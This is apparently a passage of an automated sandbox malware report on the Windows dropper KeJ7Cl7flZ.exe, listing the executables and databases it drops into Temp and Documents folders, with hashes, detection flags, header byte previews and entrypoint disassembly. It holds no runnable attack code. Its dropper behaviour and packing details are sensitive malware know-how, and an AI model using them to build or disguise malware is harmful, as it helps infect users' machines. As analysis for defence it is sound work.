                                                                                                              Size (bytes):3
                                                                                                              Entropy (8bit):0.9182958340544896
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:f:f
                                                                                                              MD5:93DD4DE5CDDBA2C733C65F233097F05A
                                                                                                              SHA1:6FC978AF728D43C59FAA400D5F6E0471AC850D4C
                                                                                                              SHA-256:A1DD6837F284625BDB1CB68F1DBC85C5DC4D8B05BAE24C94ED5F55C477326EA2
                                                                                                              SHA-512:FA3AD36CF41C6AF0E9EC7CCFDB69276D67F5C5F99D09064DC565FCDE761E7D9F7FD2AE45DFD8487C89AFF5BBCC11B58EBF44D5C22F114249B3CA4A6E088B42B2
                                                                                                              Malicious:false
                                                                                                              Preview: 002
                                                                                                              C:\Users\user\AppData\Local\Temp\RarSFX0\d
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe
                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                              Category:dropped
                                                                                                              Size (bytes):26824704
                                                                                                              Entropy (8bit):0.9757760335200523
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:5ELvckxfFUgj2h9yr9YN/3kOunAPQoqooiO3PX2BU:eUgj2h9uYNPkOuQ
                                                                                                              MD5:E13008D82626E15656E9AB26F4901C17
                                                                                                              SHA1:A25AE485F4A14A6A04C9CCE1737FF9BF9E93DADE
                                                                                                              SHA-256:1446D4AA481B61982A52DFE5326B52B2CD8A4D8A7A33BC258D79FC024C908379
                                                                                                              SHA-512:B68A2FE17DDCC8F03B83D7F87785CABD10A8710E6E1A48183612D9228BDBECA79471556BB620BA89E06EEAB1B435DF899186DE36F4DF1131CFC596755E850D98
                                                                                                              Malicious:false
                                                                                                              Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\RarSFX0\d.INTEG.RAW
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1605
                                                                                                              Entropy (8bit):5.206056345547401
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:KuiC4ts26Fp23tnungHQCbcMU/NVlyax4dKJ1qUtLnFtAO71OZ1OOynuQL1h9uqn:K24CX7utbFU/fljPtt7cPy51huh3s
                                                                                                              MD5:D2A0EA84FB0A10722D869674BF875F53
                                                                                                              SHA1:CC2B9DDECF88BE8062DAC7B93EF742E251D9F5E6
                                                                                                              SHA-256:7AC1ACC412CFE6C754B0431A8A62F0EDA213DA1EB32584ED0D8FD2776A49AD8F
                                                                                                              SHA-512:B6BA7BF26E388E4DE069333E2094BB409F96D273CF049ECC421796589095DCAAB26703695CB26E3E9200C563DD99AE5D156D99B4DFE243AA6EE3F96942F9AEE0
                                                                                                              Malicious:false
                                                                                                              Preview: ***** Repair of database 'd' started [ESENT version 06.02.9200.0000, (ESENT[6.2.9200.0] RETAIL RTM MBCS)]....search for 'ERROR:' to find errors..search for 'WARNING:' to find warnings..checking database header..ERROR: database was not shutdown cleanly (Dirty Shutdown)..database file "d" is 26738688 bytes..database file "d" is 26738688 bytes on disk...Creating 16 threads..checking SystemRoot..SystemRoot (OE)..ERROR: page 2: dbtime is larger than database dbtime (0x3844, 0x3172)..SystemRoot (AE)..ERROR: page 3: dbtime is larger than database dbtime (0x3846, 0x3172)..checking system tables..MSysObjects ..MSysObjectsShadow ..MSysObjects:.5056:.ERROR: page 13: dbtime is larger than database dbtime (0x37e0, 0x3172)..MSysObjects:.5056:.ERROR: page 19: dbtime is larger than database dbtime (0x37f8, 0x3172)..MSysObjects:.5056:.ERROR: page 20: dbtime is larger than database dbtime (0x3899, 0x3172)..MSysObjects Name..MSysObjects RootObjects..MSysObjectsShadow:.5056:.ERROR: page 27: dbtime is larg
                                                                                                              C:\Users\user\AppData\Local\Temp\RarSFX0\d.jfm
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8192
                                                                                                              Entropy (8bit):0.07621424775336932
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:iTmARoM/ClAJOwYGll/zG6B/ill:iT2AJOHG//BE
                                                                                                              MD5:20F07AEBA37DAA75B58799DCEB795F56
                                                                                                              SHA1:041A1C528F83EF16889B529CB94BE1A19EB99254
                                                                                                              SHA-256:B1B88CC6BB90D79D746CA4CFCCAD43F07F775340575115CAD1BC49B48D633BDE
                                                                                                              SHA-512:CAEE3277934685EA0EF993876C082221548F667843E7D73030446F2102B085066678482A1578FF5B634695297D202FFA907FFE28521A915E945CE3E0BB51D7DE
                                                                                                              Malicious:false
                                                                                                              Preview: ?...........................................x+......x+..........................................x....................#......x+.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\RarSFX0\file1.exe
                                                                                                              Process:C:\Users\user\Desktop\KeJ7Cl7flZ.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):197104
                                                                                                              Entropy (8bit):5.334591854768522
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:kWsKHzuQmpEARYFlUJMym6tiWIZqU18x5w48qTdnuC61:khKTuDMFatTddE
                                                                                                              MD5:F542EE32E7168671E2952B89BE66BCA3
                                                                                                              SHA1:C3E785978EA1747182D3C153CBB39089E522A4A1
                                                                                                              SHA-256:8EE3A19D5E1A6C198E6AD759C697910D681365A638ACE0BC9E9C622AFE16BC73
                                                                                                              SHA-512:2C8C5FD5B0267F750809D2BAB24EBE070D11649CF2C827661C78C6627C8D7FC3B1375FDA43079DD7DAB21A02F5D75B9423F044203F58AEACE78C4F89D23C64AB
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W...W...W...8.9.^...8...^...8.8.`...^...P...W.......8.=.U...8...V...8...V...RichW...........................PE..L....l._.................R........... .......p....@.......................... ......<.....@....................................P....P...................#..............................................@............p...............................text....P.......R.................. ..`.rdata..^!...p..."...V..............@..@.data... ............x..............@....rsrc........P......................@..@.reloc..B...........................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\RarSFX0\hjjgaa.exe
                                                                                                              Process:C:\Users\user\Desktop\KeJ7Cl7flZ.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1001984
                                                                                                              Entropy (8bit):7.363053750938072
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:GSmPzwRTwg3dqOdzz8E8yg2Nr+r+qdTNkdBAnlXG6+Z1mbXHIH:uLg3dqOh8EPg2p+r1kUlXF+Z1IYH
                                                                                                              MD5:5AF45B49951E4E3B1C6D1A0B9CBED2DB
                                                                                                              SHA1:CAE3F32B485F8406D8C4FB9AEECEB923B94B9452
                                                                                                              SHA-256:86407608F44BB780D40B92E45B200EDB584395CA6536E172149C75FA8C60FC5E
                                                                                                              SHA-512:F4DFCD7A5DA8458FC5727DF712FEE1E14BE0B9C9FC0B14DD31C8BC10AB85E469D975C2D4982D031901ABB1BABA10DB3976B58E4D66BE1094DC79FFF04D4AC74B
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Ee.$...$...$...L...$...L...$...L...$..(C...$..(C...$..(C...$...L...$...$...$...I...$...I.$...$...$...I...$..Rich.$..........................PE..L....._.................2...&...............P....@.......................................@.....................................d.... .......................@...N..`P..p...................tQ.......P..@............P...............................text...P1.......2.................. ..`.rdata......P.......6..............@..@.data....6.......&..................@....rsrc........ ......................@..@.reloc...N...@...P..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe
                                                                                                              Process:C:\Users\user\Desktop\KeJ7Cl7flZ.exe
                                                                                                              File Type:MS-DOS executable, MZ for MS-DOS
                                                                                                              Category:dropped
                                                                                                              Size (bytes):574976
                                                                                                              Entropy (8bit):7.836549545044653
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:8dyQUaL0a2eSteSPFRLbsY/hhgKXmEuIzRP/IYLkbQVBMvtAdhKuD:syQTLcTUGAhILzpIkkCMvShX
                                                                                                              MD5:676757904C8383FD9ACBEED15AA8DCC4
                                                                                                              SHA1:63F219EC9EF458A258B1845F42D46D2B12F30E8A
                                                                                                              SHA-256:B44ACC4498924F5FA6A479E263626E3A36FEE380C6D7463269BC5054DC64C4A9
                                                                                                              SHA-512:A4D4C945D334153FB91F2736A1EF20F6C4B5C710EC7E2064CDEF503D926BB5DA16F6ED32C56D2FC94EBB0F75BE5E25E0C4CF13E8F9A8F2FD2F110B547AEC0845
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview: MZ@.....................................!..L.!Win32 .EXE...$@...PE..L....b._.................r.......................@..........................`...................p......................................\...................................................P...........................@............................MPRESS1.................................MPRESS2p................................rsrc...\...........................@..............................................................................v2.19...... ..5...5.|..y...#Vr..n!r..D&..7....z!ST.z..8...s.K..q9.......{M..1.l....b..C.v....Q.3..b.......E.7._../.....8.uq...;.....Y..wcIE.....g....I...s.S....4 .I........<j7X..R....y....h..k..m{.2-[.SB0.ZX//..Au..xi....:e`x.9.Z...].q._Ui_y..^.{.I%U-.>....{.{S..Ic=1|...G.T....oY/......w..e..d..W%.A../l.G{.Z...."....-...s.Ll.YA[.l7...2!...z.8..m..j..2".x..@..T..... .............V.^./......p.Ex.~.&.T.o.a.yT........r=.|..8.l...3...x.Do.Rt.....a..f....y.4..
                                                                                                              C:\Users\user\AppData\Local\Temp\RarSFX0\tmp.edb
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe
                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x67bf4a01, page size 32768, JustCreated, Windows version 0.0
                                                                                                              Category:dropped
                                                                                                              Size (bytes):163840
                                                                                                              Entropy (8bit):0.3131370344992014
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:Jb80jDb80jztv0sRt+lsWtktlclPktktktktktktktktktktktktktktktktktk8:Z80jH80jz1X7aNfvaXXXX
                                                                                                              MD5:90FCF86F736C8FE6ECAA12619E61CB2C
                                                                                                              SHA1:7CE6019618F2EB4CB1A90062D2EE064290D242B8
                                                                                                              SHA-256:EF996B450CD717FC6C98F57E141FE46EC09D6399E6741E27F112DA679BF21380
                                                                                                              SHA-512:8404C1BE071D57381E87E278BA956278182D46CAD0A4354EAEF48F89DF43E5FE7E37ADE99839A19BDE5878C3C997DA0CDA262A2A7D95BF25644EDCDADDB9917C
                                                                                                              Malicious:false
                                                                                                              Preview: g.J.... .......@........vI......x.................................................................................................................................................................................................................................................................................................................. ...................................................................................................................................................................................................................................................0I.......x......................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\RarSFX0\ubisoftpro.exe
                                                                                                              Process:C:\Users\user\Desktop\KeJ7Cl7flZ.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1811968
                                                                                                              Entropy (8bit):6.726904896911865
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:49152:O6NxkuveGb4EurlP8cQFtYiSoTZipZnXwm:WuveGMZ8cQF6n
                                                                                                              MD5:D8AD7E3F18ED1A10211643FC215C1C26
                                                                                                              SHA1:7878E78F38FE8D181121B967271B69688EB56FC0
                                                                                                              SHA-256:B5CACBDB1C527613FFAA6CBCDDAFF819CC1AFC5EFEC0F914B9CEA1F65C1E3FD7
                                                                                                              SHA-512:203751424C86427AFA1E5F59509412186133F57949FFDFA92FCCA14D1BAFAF6710127F409140B2DEDB25F89C9BB1EC1BA47F25A6B6B4D3CB4E753DE842F4DF9D
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........&i..H:..H:..H:...:..H:..:..H:...:..H:...:..H:...:..H:..I:a.H:..:..H:..:..H:..:[.H:..:..H:..:..H:..:..H:Rich..H:........................PE..L......_.................>...................P....@..........................0............@.................................`5..h....@..p....................0......................................@...@............P.......3..@....................text...e<.......>.................. ..`.rdata.......P.......B..............@..@.data........`...z...N..............@....rsrc........@......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\nsq2FFD.tmp\Sibuia.dll
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):540456
                                                                                                              Entropy (8bit):6.4900404695826275
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:GUBa9WxfxYRW3vwDaduy2NBCzrCJDVxsR7LafByUb2iqyTOHD:da9WxfiRCv2anZnXtLa32idOHD
                                                                                                              MD5:EB948284236E2D61EAE0741280265983
                                                                                                              SHA1:D5180DB7F54DE24C27489B221095871A52DC9156
                                                                                                              SHA-256:DBE5A7DAF5BCFF97F7C48F9B5476DB3072CC85FBFFD660ADAFF2E0455132D026
                                                                                                              SHA-512:6D8087022EE62ACD823CFA871B8B3E3251E44F316769DC04E2AD169E9DF6A836DBA95C3B268716F2397D6C6A3624A9E50DBE0BC847F3C4F3EF8E09BFF30F2D75
                                                                                                              Malicious:false
                                                                                                              Preview: MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......A.....}...}...}^..|...}...|...}^..|...}^..|...}^..|...}^..|$..}...}x..}...|...}...|...}...|z..}...|...}...|...}..?}...}..W}...}...|...}Rich...}........................PE..L....mU_...........!.....2...................P.......................................8....@.........................@...\................"........... ..(....0..LH..X(..p....................).......(..@............P...............................text....1.......2.................. ..`.rdata...]...P...^...6..............@..@.data....I..........................@....rsrc....".......$..................@..@.reloc..LH...0...J..................@..B................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):3956884
                                                                                                              Entropy (8bit):7.9692463026726985
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:98304:MoxQvFZ6eRJK3WbxBaOiKH2v6Ks4pmf6pK6Iir6l3C36+a:4yn2xBayWv6Jgmf6ROxC4
                                                                                                              MD5:D64E3CC11AFC6331715BDFEC5F26C2A0
                                                                                                              SHA1:BA606F3C9115C584A902C909AC82F411463B551A
                                                                                                              SHA-256:4C02D9BCAE00635DF67EA4D3D64C67F258F0256C9F1553997815F8702BC34C63
                                                                                                              SHA-512:DA002E155D6BAF03648576A4574EA4635BD35ADE04EA0175F3F406895085CD1DA9A19EB0E19E0445D40C7D6E2A42D613F0D65684775022AD426DB840034448CB
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...,...._......._..'...._f.'...._..'...Rich&...................PE..L....~.^..................................... ....@..........................0............@.............................4...4...<.... ..p.......................d"......T............................D..@............ ..`....... ....................text...*........................... ..`.rdata...... ......................@..@.data... 7..........................@....didat..............................@....rsrc........ ......................@..@.reloc..d".......$..................@..B........................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\sib309A.tmp\SibCa.dll
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4096
                                                                                                              Entropy (8bit):6.867501832742936
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:PAWqGuIO1w7JElw764ulqk4uWdCXufAx8Su2yk:oWaIO1S7ulqBhv+yk
                                                                                                              MD5:04F3C7753A4FCABCE7970BFA3B5C76FF
                                                                                                              SHA1:34FC37D42F86DAC1FD1171A806471CDFEAE9817B
                                                                                                              SHA-256:A735E33A420C2AD93279253BC57137947B5D07803FF438499AAAF6FD0692F4CD
                                                                                                              SHA-512:F774FC3F3EBF029DC6F122669060351CC58AE27C5224ABE2A6C8AB1308C4B796657D2F286760EB73A2AE7563EEEF335DAA70ED5E4B2560D34CA9873017658AFE
                                                                                                              Malicious:false
                                                                                                              Preview: ..MZ.........0......8-..@.8.0..p.........!...L.!This. program. cannot .be run i.n DOS mo.de....$...PE..L....d82........!..0............. ..B................... ...........@..*..-......#......`....O...+h..........(.Q..........8W.....O......HA...text..........u.[.......`.rsrc...M;.}.t.......@.0relo...U..)......B.......5...&......S..4o.......F.......s....(.....*..(....{.%...{.9....[...4.*..(".....}...."}A...}....D.}..6..B.(...+**D...* 6..si.......*...0.....,....(.....~......oRj..*&.....N"(@M.-...on.A..0......!H.(...o...."r..p(...(.E..r@.po.@.....o..........%.B.....(.@........o...&..% ....o.x......u...,..B...o!..B!....!...~...Tu.."..[......#E..8...o"..$Q ....c..o....*..*..`......IT..G.:. `....@;.`.0...`. 5.@.r?..pB1..s#.....A.R.%.r..p.%.DrW...%..*rFq .b*..s....%.o%@.%.oB&....o'...Do(..........o)......"o.>.o+..,oE..,a..+?.,-.@.t.7.a-%o......Yo/.../.o.].....-...r..../. #"...1..-......u.>....., ...o2......#...>....L....X..a"0.$..V..h".r..."3a..r.`.rZ@..p.(4 ....+!rh..c.B..r...po..D.U.*..*.
                                                                                                              C:\Users\user\AppData\Local\Temp\sib309A.tmp\SibClr.dll
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe
                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):52520
                                                                                                              Entropy (8bit):6.011934677477037
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:9GyM4uxlvOe/c1xpfLIa97v3A5KobiPWh:9G1vt/g7fLb97Y5VmY
                                                                                                              MD5:928E680DEA22C19FEBE9FC8E05D96472
                                                                                                              SHA1:0A4A749DDFD220E2B646B878881575FF9352CF73
                                                                                                              SHA-256:8B6B56F670D59FF93A1C7E601468127FC21F02DDE567B5C21A5D53594CDAEF94
                                                                                                              SHA-512:5FBC72C3FA98DC2B5AD2ED556D2C6DC9279D4BE3EB90FFD7FA2ADA39CB976EBA7CB34033E5786D1CB6137C64C869027002BE2F2CAD408ACEFD5C22006A1FEF34
                                                                                                              Malicious:false
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d82............!..0.................. ........... ....................... ............@.....................................O.......h...............(...............8............................................ ............... ..H............text........ ...................... ..`.rsrc...h...........................@..@.reloc..............................@..B........................H........S..4o..........................................................F......s....(....*..(....*..{....*..{....*..{....*..{....*..(......}......}......}.......}....*6..{....(...+**..{......*6..si........*...0...........(.....~........oj...*&~.......*N(....-.~.....on...*.0..........(....o......r...p(....(....r...po.......o...........%.~.......(..........o....&........o .......u....,.~......o!...on... ...!...~..u....,.~......o!...on... ..."...[..u....,.~......o!...on... ...#
                                                                                                              C:\Users\user\Documents\VlcpVideoV1.0.1\jg2_2qua.exe
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe
                                                                                                              File Type:MS-DOS executable, MZ for MS-DOS
                                                                                                              Category:dropped
                                                                                                              Size (bytes):574976
                                                                                                              Entropy (8bit):7.836549545044653
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:8dyQUaL0a2eSteSPFRLbsY/hhgKXmEuIzRP/IYLkbQVBMvtAdhKuD:syQTLcTUGAhILzpIkkCMvShX
                                                                                                              MD5:676757904C8383FD9ACBEED15AA8DCC4
                                                                                                              SHA1:63F219EC9EF458A258B1845F42D46D2B12F30E8A
                                                                                                              SHA-256:B44ACC4498924F5FA6A479E263626E3A36FEE380C6D7463269BC5054DC64C4A9
                                                                                                              SHA-512:A4D4C945D334153FB91F2736A1EF20F6C4B5C710EC7E2064CDEF503D926BB5DA16F6ED32C56D2FC94EBB0F75BE5E25E0C4CF13E8F9A8F2FD2F110B547AEC0845
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview: MZ@.....................................!..L.!Win32 .EXE...$@...PE..L....b._.................r.......................@..........................`...................p......................................\...................................................P...........................@............................MPRESS1.................................MPRESS2p................................rsrc...\...........................@..............................................................................v2.19...... ..5...5.|..y...#Vr..n!r..D&..7....z!ST.z..8...s.K..q9.......{M..1.l....b..C.v....Q.3..b.......E.7._../.....8.uq...;.....Y..wcIE.....g....I...s.S....4 .I........<j7X..R....y....h..k..m{.2-[.SB0.ZX//..Au..xi....:e`x.9.Z...].q._Ui_y..^.{.I%U-.>....{.{S..Ic=1|...G.T....oY/......w..e..d..W%.A../l.G{.Z...."....-...s.Ll.YA[.l7...2!...z.8..m..j..2".x..@..T..... .............V.^./......p.Ex.~.&.T.o.a.yT........r=.|..8.l...3...x.Do.Rt.....a..f....y.4..

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Entropy (8bit):7.99387668493442
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:KeJ7Cl7flZ.exe
                                                                                                              File size:7922731
                                                                                                              MD5:4e759849412063c6590936671ce4aa0e
                                                                                                              SHA1:40d132516cc4b9aa00dca2b2f068c439cf8f59c3
                                                                                                              SHA256:7a79f0c95e891b939e275fa19e641b676f2eb70471945fb3b15d6a649cafe071
                                                                                                              SHA512:636f2e0049eab66d31a07446dbd9a747931c2ee8954b9878a7133c783e530eeba7b45060ad3bcf2f7e70c96fac4b680650c6c501aabb48cdfe98457535297e91
                                                                                                              SSDEEP:196608:KBYjwbZ5mValPcW4lib2cnmzq3oi7eGhJe+Qc7z11mX6ZnGw:jM5GMxb2cmcoi7Pa8z11mXg
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........}.k...k...k..c.a..k..c.c.[k..c.b..k..I.W..k...5./.k...5./.k...5./.k.......k.......k...k..!k..@5./.k..@5./.k..E5o..k..@5./.k.

                                                                                                              File Icon

                                                                                                              Icon Hash:d49494d6c88ecec2

                                                                                                              Static PE Info

                                                                                                              General

                                                                                                              Entrypoint:0x413c60
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                              DLL Characteristics:GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                              Time Stamp:0x5EF47EA5 [Thu Jun 25 10:38:29 2020 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:5
                                                                                                              OS Version Minor:1
                                                                                                              File Version Major:5
                                                                                                              File Version Minor:1
                                                                                                              Subsystem Version Major:5
                                                                                                              Subsystem Version Minor:1
                                                                                                              Import Hash:ae9f6a32bb8b03dce37903edbc855ba1

                                                                                                              Entrypoint Preview

                                                                                                              Instruction
                                                                                                              call 00007FF0987CDBDDh
                                                                                                              jmp 00007FF0987CD51Dh
                                                                                                              cmp ecx, dword ptr [00431558h]
                                                                                                              jne 00007FF0987CD695h
                                                                                                              ret
                                                                                                              jmp 00007FF0987CDD5Eh
                                                                                                              jmp 00007FF0987D20B3h
                                                                                                              push ebp
                                                                                                              mov ebp, esp
                                                                                                              and dword ptr [00465380h], 00000000h
                                                                                                              sub esp, 28h
                                                                                                              push ebx
                                                                                                              xor ebx, ebx
                                                                                                              inc ebx
                                                                                                              or dword ptr [0043155Ch], ebx
                                                                                                              push 0000000Ah
                                                                                                              call 00007FF0987E0223h
                                                                                                              test eax, eax
                                                                                                              je 00007FF0987CD803h
                                                                                                              and dword ptr [ebp-10h], 00000000h
                                                                                                              xor eax, eax
                                                                                                              or dword ptr [0043155Ch], 02h
                                                                                                              xor ecx, ecx
                                                                                                              push esi
                                                                                                              push edi
                                                                                                              mov dword ptr [00465380h], ebx
                                                                                                              lea edi, dword ptr [ebp-28h]
                                                                                                              push ebx
                                                                                                              cpuid
                                                                                                              mov esi, ebx
                                                                                                              pop ebx
                                                                                                              mov dword ptr [edi], eax
                                                                                                              mov dword ptr [edi+04h], esi
                                                                                                              mov dword ptr [edi+08h], ecx
                                                                                                              mov dword ptr [edi+0Ch], edx
                                                                                                              mov eax, dword ptr [ebp-28h]
                                                                                                              mov ecx, dword ptr [ebp-1Ch]
                                                                                                              mov dword ptr [ebp-08h], eax
                                                                                                              xor ecx, 49656E69h
                                                                                                              mov eax, dword ptr [ebp-20h]
                                                                                                              xor eax, 6C65746Eh
                                                                                                              or ecx, eax
                                                                                                              mov eax, dword ptr [ebp-24h]
                                                                                                              push 00000001h
                                                                                                              xor eax, 756E6547h
                                                                                                              or ecx, eax
                                                                                                              pop eax
                                                                                                              push 00000000h
                                                                                                              pop ecx
                                                                                                              push ebx
                                                                                                              cpuid
                                                                                                              mov esi, ebx
                                                                                                              pop ebx
                                                                                                              mov dword ptr [edi], eax
                                                                                                              mov dword ptr [edi+04h], esi
                                                                                                              mov dword ptr [edi+08h], ecx
                                                                                                              mov dword ptr [edi+0Ch], edx
                                                                                                              jne 00007FF0987CD6D5h
                                                                                                              mov eax, dword ptr [ebp-28h]
                                                                                                              and eax, 0FFF3FF0h
                                                                                                              cmp eax, 000106C0h
                                                                                                              je 00007FF0987CD6B5h
                                                                                                              cmp eax, 00020660h
                                                                                                              je 00007FF0987CD6AEh
                                                                                                              cmp eax, 00020670h

                                                                                                              Rich Headers

                                                                                                              Programming Language:
                                                                                                              • [ C ] VS2008 SP1 build 30729
                                                                                                              • [EXP] VS2015 UPD3.1 build 24215
                                                                                                              • [LNK] VS2015 UPD3.1 build 24215
                                                                                                              • [IMP] VS2008 SP1 build 30729
                                                                                                              • [C++] VS2015 UPD3.1 build 24215
                                                                                                              • [RES] VS2015 UPD3 build 24213

                                                                                                              Data Directories

                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x2ffa00x34.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x2ffd40x3c.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x670000xdfd0.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x750000x27ec.reloc
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x2e8100x54.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x292380x40.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x270000x220.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x2f6940x100.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                              Sections

                                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              .text0x10000x25f0a0x26000False0.577264083059data6.69284076721IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                              .rdata0x270000x9c140x9e00False0.453075553797data5.20986268254IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .data0x310000x34d900xe00False0.377790178571data3.79528519664IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
